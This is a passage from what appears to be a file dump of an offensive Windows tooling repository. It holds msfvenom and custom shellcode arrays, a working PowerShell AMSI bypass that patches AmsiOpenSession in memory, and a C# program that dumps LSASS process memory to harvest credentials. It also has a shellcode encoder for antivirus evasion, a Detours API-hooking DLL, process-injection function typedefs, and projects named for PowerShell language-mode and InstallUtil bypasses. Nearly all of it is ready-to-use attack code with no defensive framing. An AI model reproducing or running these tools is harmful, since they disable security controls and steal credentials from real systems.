11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // RCDATA
51 | //
52 |
53 | IDR_RCDATA1 RCDATA "rcdata1.bin"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64-thread.txt:
--------------------------------------------------------------------------------
1 | $ msfvenom -p windows/x64/messagebox text="Hello World \!" exitfunc=thread -f c
2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
3 | [-] No arch selected, selecting arch: x64 from the payload
4 | No encoder specified, outputting raw payload
5 | Payload size: 320 bytes
6 | Final size of c file: 1370 bytes
7 | unsigned char buf[] =
8 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51"
9 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48"
10 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48"
11 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02"
12 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e"
13 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88"
14 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48"
15 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e"
16 | "\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41"
17 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24"
18 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0"
19 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e"
20 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
21 | "\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
22 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1"
23 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e\x4c\x8d"
24 | "\x85\x28\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff"
25 | "\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
26 | "\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
27 | "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x48\x65\x6c\x6c\x6f"
28 | "\x20\x57\x6f\x72\x6c\x64\x20\x21\x00\x4d\x65\x73\x73\x61\x67"
29 | "\x65\x42\x6f\x78\x00";
--------------------------------------------------------------------------------
/C++/SysWhispers/shellcode.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | unsigned char shellcode[] =
4 | "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
5 | "\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
6 | "\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
7 | "\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
8 | "\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
9 | "\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D"
10 | "\x0A\x00\x00\x00\xE8\x56\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B"
11 | "\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61"
12 | "\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33"
13 | "\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F"
14 | "\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00"
15 | "\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78\x69\x74\x50\x72\x6F"
16 | "\x63\x65\x73\x73\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60"
17 | "\x00\x00\x00\x4D\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24"
18 | "\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27"
19 | "\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7"
20 | "\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4\x75\xD6\x48\x33"
21 | "\xC0\xE9\xA7\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C"
22 | "\x03\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED"
23 | "\x75\x08\x48\x33\xC0\xE9\x85\x00\x00\x00\x4E\x8D\x04\x2B\x45"
24 | "\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C"
25 | "\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48"
26 | "\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6"
27 | "\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B"
28 | "\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B"
29 | "\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x18\x48\x8D\x7C"
30 | "\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44"
31 | "\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6"
32 | "\xE9\x14\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3";
--------------------------------------------------------------------------------
/PowerShell/amsi-bypass.ps1:
--------------------------------------------------------------------------------
1 | function LookupFunc {
2 |
3 | Param ($moduleName, $functionName)
4 |
5 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
6 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
7 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
8 | $tmp=@()
9 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
10 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
11 | }
12 |
13 | function getDelegateType {
14 |
15 | Param (
16 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
17 | [Parameter(Position = 1)] [Type] $delType = [Void]
18 | )
19 |
20 | $type = [AppDomain]::CurrentDomain.
21 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
22 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
23 | DefineDynamicModule('InMemoryModule', $false).
24 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
25 | [System.MulticastDelegate])
26 |
27 | $type.
28 | DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).
29 | SetImplementationFlags('Runtime, Managed')
30 |
31 | $type.
32 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
33 | SetImplementationFlags('Runtime, Managed')
34 |
35 | return $type.CreateType()
36 | }
37 |
38 | [IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
39 | $oldProtectionBuffer = 0
40 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
41 | $vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
42 |
43 | $buf = [Byte[]] (0x48, 0x31, 0xC0)
44 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)
45 | $vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)
--------------------------------------------------------------------------------
/ProcDump/ProcDump/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Runtime.InteropServices;
4 | using System.IO;
5 |
6 | namespace LsassDump
7 | {
8 | class Program
9 | {
10 | static void Main(string[] args)
11 | {
12 | if (args.Length < 1)
13 | {
14 | Console.WriteLine("[*] Usage: Program.exe ");
15 | return;
16 | }
17 |
18 |
19 | // Create a file for the dumped content of lsass
20 | string fLocation = $"{args[0]}";
21 |
22 | Console.WriteLine($"[+] Dumping contents to: {fLocation}");
23 |
24 | FileStream dumpFile = new FileStream(fLocation, FileMode.Create);
25 |
26 | // Grab the lsass process PID
27 | Process[] lsass = Process.GetProcessesByName("lsass");
28 | int lsass_pid = lsass[0].Id;
29 | Console.WriteLine($"[*] LSASS PID: {lsass_pid}");
30 |
31 | // Attach to the process and dump contents
32 | // 0x001F0FFF = ALL_ACCESS
33 | IntPtr handle = OpenProcess(0x001F0FFF, false, lsass_pid);
34 | bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
35 |
36 | if (dumped == false)
37 | {
38 | Console.WriteLine("[-] Dumping failed ! Error: {0}", Marshal.GetLastWin32Error());
39 | return;
40 | }
41 |
42 | Console.WriteLine($"[+] LSASS dumped to: {fLocation}");
43 | }
44 |
45 | [DllImport("Dbghelp.dll")]
46 | static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);
47 |
48 | [DllImport("kernel32.dll")]
49 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
50 |
51 | [DllImport("kernel32.dll")]
52 | static extern uint GetLastError();
53 | }
54 | }
55 |
--------------------------------------------------------------------------------
/C++/Caesar_Encrypter/Caesar_Encrypter.cpp:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | #pragma warning(disable:4996)
4 |
5 | unsigned char rawbuf[] =
6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
24 | "\x63\x2e\x65\x78\x65\x00";
25 |
26 | int main(int argc, char* argv[])
27 | {
28 | unsigned char encodedBytes[] = {0};
29 | int Size = sizeof(rawbuf);
30 |
31 | printf("[*] Shellcode Size: %i\n", Size);
32 | printf("[*] Encrypted Bytes: \n");
33 | printf("unsigned char buf[] = \"");
34 | /* Encryption method */
35 | for (int i = 0; i < Size; i++) {
36 | encodedBytes[i] = (unsigned char)(((unsigned int)rawbuf[i] + 53) & 0xFF); // "2" is the modifier, change it if needed
37 | printf("\\x%02hhx", encodedBytes[i]);
38 | }
39 | printf("\";\n");
40 |
41 | /* Decryption method
42 | for (int i = 0; i < Size; i++) {
43 | encodedBytes[i] = (unsigned char)(((unsigned int)encbuf[i] - 2) & 0xFF);
44 | printf("\\x%02hhx", encodedBytes[i]);
45 | }
46 | */
47 |
48 | return 0;
49 | }
50 |
--------------------------------------------------------------------------------
/C++/API_Hooking/Detours/HookExe/hookintoexe.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | A WINAPI* pointer is defined which will be assigned to MessageBoxW API.
3 | When the DLL is injected into a running process, it will look for
4 | the MessageBoxW API call and hook into it.
5 | A printf() function will run to say that the hook was attached.
6 |
7 | Upon unhooking, the process will terminate and if more MessageBoxW API calls are in the
8 | EXE, then none will be executed and program will be terminated
9 | */
10 | #include
11 | #include
12 |
13 | #include "detours/detours.h"
14 |
15 | #pragma comment(lib, "user32.lib")
16 |
17 | // pointer to original MessageBox
18 | int (WINAPI* pOrigMessageBoxW)(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) = MessageBoxW;
19 |
20 | // Hooking function
21 | int HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType)
22 | {
23 |
24 | printf("HookedMessageBox() called. No popup on screen!\n");
25 |
26 | return IDOK;
27 | }
28 |
29 | // Set hooks on MessageBox
30 | BOOL Hookem(void)
31 | {
32 | LONG err;
33 |
34 | DetourTransactionBegin();
35 | DetourUpdateThread(GetCurrentThread());
36 | DetourAttach( &(PVOID&)pOrigMessageBoxW,
37 | HookedMessageBox);
38 |
39 | err = DetourTransactionCommit();
40 |
41 | printf("MessageBox() hooked! (res = %d)\n", err);
42 |
43 | return TRUE;
44 | }
45 |
46 | // Revert all changes to original code
47 | BOOL UnHookem(void)
48 | {
49 | LONG err;
50 |
51 | DetourTransactionBegin();
52 | DetourUpdateThread(GetCurrentThread());
53 | DetourDetach( &(PVOID&)pOrigMessageBoxW,
54 | HookedMessageBox);
55 |
56 | err = DetourTransactionCommit();
57 |
58 | printf("Hook removed from MessageBox() with result = %d\n", err);
59 |
60 | return TRUE;
61 | }
62 |
63 | BOOL WINAPI DllMain(HINSTANCE hinst,
64 | DWORD dwReason,
65 | LPVOID reserved)
66 | {
67 |
68 | switch (dwReason) {
69 | case DLL_PROCESS_ATTACH:
70 | Hookem();
71 | break;
72 |
73 | case DLL_THREAD_ATTACH:
74 | break;
75 |
76 | case DLL_THREAD_DETACH:
77 | break;
78 |
79 | case DLL_PROCESS_DETACH:
80 | UnHookem();
81 | break;
82 | }
83 |
84 | return TRUE;
85 | }
86 |
87 |
--------------------------------------------------------------------------------
/shellcodes/MessageBox/messagebox-64-git.txt:
--------------------------------------------------------------------------------
1 | Payload size: 434 bytes
2 | unsigned char shellcode[] =
3 | "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
4 | "\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
5 | "\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
6 | "\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
7 | "\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
8 | "\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D"
9 | "\x0A\x00\x00\x00\xE8\x56\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B"
10 | "\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61"
11 | "\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33"
12 | "\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F"
13 | "\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00"
14 | "\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78\x69\x74\x50\x72\x6F"
15 | "\x63\x65\x73\x73\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60"
16 | "\x00\x00\x00\x4D\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24"
17 | "\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27"
18 | "\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7"
19 | "\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4\x75\xD6\x48\x33"
20 | "\xC0\xE9\xA7\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C"
21 | "\x03\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED"
22 | "\x75\x08\x48\x33\xC0\xE9\x85\x00\x00\x00\x4E\x8D\x04\x2B\x45"
23 | "\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C"
24 | "\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48"
25 | "\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6"
26 | "\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B"
27 | "\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B"
28 | "\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x18\x48\x8D\x7C"
29 | "\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44"
30 | "\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6"
31 | "\xE9\x14\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3";
--------------------------------------------------------------------------------
/C++/Heaven's_Gate/pfndef.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 |
5 | typedef BOOL (WINAPI* pfnVirtualProtectEx)(
6 | IN HANDLE hProcess,
7 | IN LPVOID lpAddress,
8 | IN SIZE_T dwSize,
9 | IN DWORD flNewProtect,
10 | OUT PDWORD lpflOldProtect
11 | );
12 |
13 | typedef BOOL (WINAPI* pfnWriteProcessMemory)(
14 | IN HANDLE hProcess,
15 | IN LPVOID lpBaseAddress,
16 | IN LPCVOID lpBuffer,
17 | IN SIZE_T nSize,
18 | OUT SIZE_T* lpNumberOfBytesWritten
19 | );
20 |
21 | typedef LPVOID (WINAPI* pfnVirtualAllocEx)(
22 | IN HANDLE hProcess,
23 | IN OPTIONAL LPVOID lpAddress,
24 | IN SIZE_T dwSize,
25 | IN DWORD flAllocationType,
26 | IN DWORD flProtect
27 | );
28 |
29 | typedef LPVOID (WINAPI* pfnVirtualAlloc)(
30 | IN OPTIONAL LPVOID lpAddress,
31 | IN SIZE_T dwSize,
32 | IN DWORD flAllocationType,
33 | IN DWORD flProtect
34 | );
35 |
36 | typedef BOOL (WINAPI* pfnVirtualFree)(
37 | IN LPVOID lpAddress,
38 | IN SIZE_T dwSize,
39 | IN DWORD dwFreeType
40 | );
41 |
42 | typedef HANDLE (WINAPI* pfnOpenProcess)(
43 | IN DWORD dwDesiredAccess,
44 | IN BOOL bInheritHandle,
45 | IN DWORD dwProcessId
46 | );
47 |
48 | typedef HANDLE (WINAPI* pfnCreateRemoteThread)(
49 | IN HANDLE hProcess,
50 | IN LPSECURITY_ATTRIBUTES lpThreadAttributes,
51 | IN SIZE_T dwStackSize,
52 | IN LPTHREAD_START_ROUTINE lpStartAddress,
53 | IN LPVOID lpParameter,
54 | IN DWORD dwCreationFlags,
55 | OUT LPDWORD lpThreadId
56 | );
57 |
58 | typedef HANDLE (WINAPI* pfnCreateToolhelp32Snapshot)(
59 | IN DWORD dwFlags,
60 | IN DWORD th32ProcessID
61 | );
62 |
63 | typedef BOOL (WINAPI* pfnProcess32FirstW)(
64 | IN HANDLE hSnapshot,
65 | IN OUT LPPROCESSENTRY32W lppe
66 | );
67 |
68 | typedef BOOL (WINAPI* pfnProcess32NextW)(
69 | IN HANDLE hSnapshot,
70 | OUT LPPROCESSENTRY32W lppe
71 | );
72 |
73 | typedef BOOL (WINAPI* pfnCloseHandle)(
74 | IN HANDLE hObject
75 | );
76 |
77 | typedef DWORD (WINAPI* pfnResumeThread)(
78 | IN HANDLE hThread
79 | );
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31424.327
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PSLangBypass", "PSLangBypass\PSLangBypass.csproj", "{C10F38A5-FE8E-4D99-AA8B-240F935778E5}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PSLangBypass_SpawnShell", "PSLangBypass_SpawnShell\PSLangBypass_SpawnShell.csproj", "{9C213991-B733-4907-BE3F-03D8317ADE11}"
9 | EndProject
10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PSLangBypass_InstallUtil_Bypass", "PSLangBypass_InstallUtil_Bypass\PSLangBypass_InstallUtil_Bypass.csproj", "{9256A08B-3FE0-4746-B6EE-050183C4EAFE}"
11 | EndProject
12 | Global
13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
14 | Debug|Any CPU = Debug|Any CPU
15 | Release|Any CPU = Release|Any CPU
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {C10F38A5-FE8E-4D99-AA8B-240F935778E5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
19 | {C10F38A5-FE8E-4D99-AA8B-240F935778E5}.Debug|Any CPU.Build.0 = Debug|Any CPU
20 | {C10F38A5-FE8E-4D99-AA8B-240F935778E5}.Release|Any CPU.ActiveCfg = Release|x64
21 | {C10F38A5-FE8E-4D99-AA8B-240F935778E5}.Release|Any CPU.Build.0 = Release|x64
22 | {9C213991-B733-4907-BE3F-03D8317ADE11}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
23 | {9C213991-B733-4907-BE3F-03D8317ADE11}.Debug|Any CPU.Build.0 = Debug|Any CPU
24 | {9C213991-B733-4907-BE3F-03D8317ADE11}.Release|Any CPU.ActiveCfg = Release|Any CPU
25 | {9C213991-B733-4907-BE3F-03D8317ADE11}.Release|Any CPU.Build.0 = Release|Any CPU
26 | {9256A08B-3FE0-4746-B6EE-050183C4EAFE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
27 | {9256A08B-3FE0-4746-B6EE-050183C4EAFE}.Debug|Any CPU.Build.0 = Debug|Any CPU
28 | {9256A08B-3FE0-4746-B6EE-050183C4EAFE}.Release|Any CPU.ActiveCfg = Release|x64
29 | {9256A08B-3FE0-4746-B6EE-050183C4EAFE}.Release|Any CPU.Build.0 = Release|x64
30 | EndGlobalSection
31 | GlobalSection(SolutionProperties) = preSolution
32 | HideSolutionNode = FALSE
33 | EndGlobalSection
34 | GlobalSection(ExtensibilityGlobals) = postSolution
35 | SolutionGuid = {970F1603-B3A1-4324-A454-2E48B759E80F}
36 | EndGlobalSection
37 | EndGlobal
38 |
--------------------------------------------------------------------------------